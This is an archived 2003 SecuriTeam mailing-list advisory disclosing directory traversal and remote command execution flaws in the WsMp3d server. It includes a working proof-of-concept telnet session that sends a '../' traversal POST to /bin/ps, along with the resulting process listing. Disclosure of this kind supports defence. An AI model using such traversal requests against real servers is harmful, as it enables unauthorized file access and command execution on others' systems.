[UNIX] WsMP3d Directory Traversing Vulnerability

• Previous message: SecuriTeam: "[UNIX] Remote Heap Corruption Overflow vulnerability in WsMp3d (CHA)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 21 May 2003 18:46:33 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  WsMP3d Directory Traversing Vulnerability
------------------------------------------------------------------------

SUMMARY

 <http://wsmp3.sourceforge.net> WsMp3d is a "web server which also acts as
a ShoutCast-server". Two vulnerabilities in the product allow remote
attackers to access files that reside outside the bound HTML directory.
This would in turn allow execution of arbitrary commands and viewing of
arbitrary files.

DETAILS

Directory traversing vulnerability:
By issuing the following request:
http://wsmp3.server.com/cmd:ls

A directory listing is returned. By requesting directories that reside
outside the bounding HTML root directory, it is possible to access
arbitrary files.

Remote command execution:
By accessing binary files, for example /bin/ps, it is possible to cause
them to execute (instead of being viewed).

Example:
bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Date: Sat May 03 01:25:28 2003
Last-Modified: Sat May 03 01:25:28 2003
Content-Length: 201

  PID TTY TIME CMD
29529 pts/2 00:00:00 login
29559 pts/2 00:00:00 su
29560 pts/2 00:00:00 bash
29681 pts/2 00:00:10 WsMp3
29730 pts/2 00:00:00 WsMp3
29731 pts/2 00:00:00 ps
Connection closed by foreign host.
bash$

ADDITIONAL INFORMATION

The information has been provided by <mailto:xploit@hackermail.com>
dong-h0un U.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Remote Heap Corruption Overflow vulnerability in WsMp3d (CHA)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]